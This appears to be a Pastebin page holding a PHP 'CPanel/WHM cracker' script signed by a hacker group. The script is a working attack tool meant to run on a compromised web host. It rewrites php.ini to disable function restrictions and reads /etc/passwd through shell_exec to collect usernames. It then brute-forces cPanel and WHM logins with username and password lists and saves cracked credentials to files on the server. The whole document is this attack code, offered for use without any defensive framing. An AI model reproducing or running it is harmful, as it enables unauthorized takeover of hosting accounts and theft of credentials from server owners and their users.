Advertisement
EddieKidiw

--==[[P1nk || n63507]]==--

May 15th, 2016
492
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.67 KB | None | 0 0
  1. <title>--==[[P1nk || n63507]]==--</title>
  2. <body bgcolor=black>
  3. <p h3 style="text-align:center">
  4. <div align=center>
  5. <table width=100%>
  6. <tr>
  7. <td align=center>
  8. <font size=6 color=white face="comic sans ms"> RR</font>
  9. <font size=5 color=white face="comic sans ms"> CPanel/WHM</font>
  10. <font size=5 color=white face="comic sans ms"> cracker By </font>
  11. <font size=5 color=white face="comic sans ms">P1nk</font>
  12. <font size=6 color=white face="comic sans ms"></font>    <br>
  13. <font color="green" face="comic sans ms"size="1">
  14. <font color=white><b>-==[[Greetz to]]==--</font><br>
  15. <font color=green size=2>  312w177 | Biang Kerox Hacker Team -- <br>
  16. <font color=white>--==[[RACIKANE]]==--</font><br># P1nk #</table>
  17. </table>
  18. <div align=center>
  19. <font color=white size=4 face='comic sans ms'>>>>&nbsp<a href="<?php echo '?ini'; ?>"><font color=white size=3>rUn php.1n1 first of 4ll</b></font></a>
  20. <font color=white size=4 face='comic sans ms'>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<a href="<?php echo '?/var/mail'; ?>"><font color=white size=3>Us3rN4m3 ExTracTor</font></a>&nbsp&nbsp&nbsp&nbsp<?php $r=gethostbyname($_SERVER["HTTP_HOST"]); $s="<a href=http://".$r.":2082><font color=white size=4 face='comic sans ms'>link for cpanel login</a>"; echo $s; ?>&nbsp<<<<br>
  21. <?php
  22. if(isset($_GET['ini'])){
  23. $r=@fopen('php.ini',w);
  24. $s="disable_functions =none ";
  25. $t=@fwrite($r,$s);
  26. echo "<p><a href=php.ini><font color=white size=4 face='comic sans ms'>link  to php.ini</a>";
  27. }
  28. ?>
  29. <?php
  30. if(isset($_GET['/var/mail'])){
  31. ?>
  32. <form method=post>
  33. <textarea style="background:black;color:white" name=pass rows=20 cols=20 ><?php $r="cat /etc/passwd | cut -d \":\" -f 1"; echo shell_exec($r); ?></textarea><br>
  34. <input type=submit name=subm value="click untuk Copy all usernames to username filed" /></form>
  35. <?php
  36. }
  37. ?>
  38. <form method=post>
  39. <div align=center>
  40. <font color=red size=3 face='comic sans ms'>/--------------------------------------------\<br></font>
  41. <div align=center>
  42. <font color=white size=3 face='comic sans ms'>&nbsp{&nbsp&nbsp&nbsp Usernames&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp Passwords &nbsp&nbsp&nbsp&nbsp&nbsp }</font>
  43. </table>
  44. <br>
  45. <div align=center>
  46. <font color=green size=3 face='comic sans ms'>\-------------------------------------------/</font><br>
  47. <table>
  48. <font color=white size=3 face="comic sans ms">Attack =>
  49. <select name="op">
  50. <option name="op" value="cp">CPanel</option>
  51. <option name="op" value="whm">WHMPanel</option>
  52. </table>
  53. <br>
  54. <?php
  55. if(isset($_POST['subm'])){
  56. $pa=$_POST["pass"];
  57. ?>
  58. <textarea style="background:black;color:white" rows=25 cols=25 name=usernames><?php echo $pa; ?></textarea>
  59. <?php
  60. }else{  
  61. ?>
  62. <textarea style="background:black;color:white" rows=25 cols=25 name=usernames></textarea>
  63. <?php   } ?>
  64. &nbsp <textarea style="background:black;color:white" rows=25 cols=25 name=passwords></textarea>
  65. <br>
  66. <br>
  67. <input type=submit name=cracking value="Tusbol Nang Kene Coxx"/>
  68. </form>
  69. <br>
  70. <?php
  71. error_reporting(0);
  72. $connect_timeout=5;
  73. set_time_limit(0);
  74. $submit=$_POST['submit'];
  75. $userl=$_POST['usernames'];
  76. $passl=$_POST['passwords'];
  77. $attack=$_POST['op'];
  78. $target = "localhost";
  79. if(isset($_POST['cracking'])){
  80. if($userl!=="" && $passl!==""){
  81. if($_POST["op"]=="cp"){
  82. @fopen('/cie/cie/ada/yang/kepo/haha.txt','a');
  83. echo "Tunggu Sebentar ^_^ sekarang kita plorotin cpanels .... silahkan menunggu sampai akhir proses \n";   echo "<p>
  84. <a href=/cie/cie/ada/yang/kepo/haha.txt><font color=white size=2 face='comic sans ms'>di sini adalah link untuk file, yang akan menyimpan username cpanel Cracked </font></a></p><br>";   } else if($_POST["op"]=="whm"){
  85. @fopen('cracked_whm.txt','a');
  86. echo "Tunggu Sebentar ^_^ sekarang kita plorotin cpanels whm .... silahkan menunggu sampai akhir proses";
  87. echo "<p><a href=cracked_whm.txt><font color=white size=2 face='comic sans ms'>di sini adalah link untuk file, yang akan menyimpan username cpanel whm Cracked dengan  </font></a></p><br>";
  88. }
  89. function cpanel($host,$user,$pass,$timeout){
  90. $ch = curl_init();
  91. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  92. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  93. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  94. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  95. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  96. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  97. $data = curl_exec($ch);
  98. if ( curl_errno($ch) == 0 )
  99. {
  100. echo "<table width=100%>
  101. <tr>
  102. <td align=center><b><font color=white size=2>==================================</font>
  103. <font color=red size=2> $user </font>
  104. <font color=white size=2>cracked with </font>
  105. <font color=red size=2> $pass </font>
  106. <font color=white size=2>==================================</font></b></td>
  107. </tr>
  108. </table>";
  109. $x=$user." ".$pass ." \n";
  110. $y= @fopen('/cie/cie/ada/yang/kepo/haha.txt','a+');
  111. @fwrite($y,$x);
  112. }
  113. curl_close($ch);
  114. }
  115. $userlist=explode("\n",$userl);
  116. $passlist=explode("\n",$passl);
  117. foreach ($userlist as $user) {
  118. $finaluser = trim($user);
  119. foreach ($passlist as $password ) {
  120. $finalpass = trim($password);
  121. if ($attack == "cp"){  
  122. echo "<table width=80%>
  123. <tr>
  124. <td align=center><b><font color=red size=1>Attacking user $user with password $password </font></td>
  125. </tr>
  126. </table>";
  127. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  128. }
  129. }
  130. }
  131. function whm($host,$user,$pass,$timeout){
  132. $ch = curl_init();
  133. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  134. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  135. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  136. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  137. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  138. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  139. $data = curl_exec($ch);
  140. if ( curl_errno($ch) == 0 ){
  141. echo "<table width=100%>
  142. <tr>
  143. <td align=center><b><font color=white size=2>==================================</font>
  144. <font color=red size=2> $user </font>
  145. <font color=white size=2>cracked with </font>
  146. <font color=red size=2> $pass </font>
  147. <font color=white size=2>==================================</font></b></td>
  148. </tr>
  149. </table>";
  150. $x=$user." ".$pass ." \n";
  151. $y=@fopen('cracked_whm.txt','a+');
  152. @fwrite($y,$x);  
  153. }
  154. curl_close($ch);
  155. }
  156. $userlist=explode("\n",$userl);
  157. $passlist=explode("\n",$passl);
  158. foreach ($userlist as $user) {
  159. $finaluser = trim($user);
  160. foreach ($passlist as $password ) {
  161. $finalpass = trim($password);
  162. if ($attack == "whm"){
  163. echo "<table width=80%>
  164. <tr>
  165. <td align=center><b><font color=white size=2>user under attack is $user </font></td>
  166. </tr>
  167. </table>";
  168. whm($target,$finaluser,$finalpass,$connect_timeout);}
  169. }
  170. }
  171. }else if($userl==""){  
  172. echo "what are you doing  :( , you have left userlist field empty";      
  173. } else if($passl=="")   {            
  174. echo "bhai ji :( ... please put passwords in paasword list field";      
  175. }
  176. }
  177. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement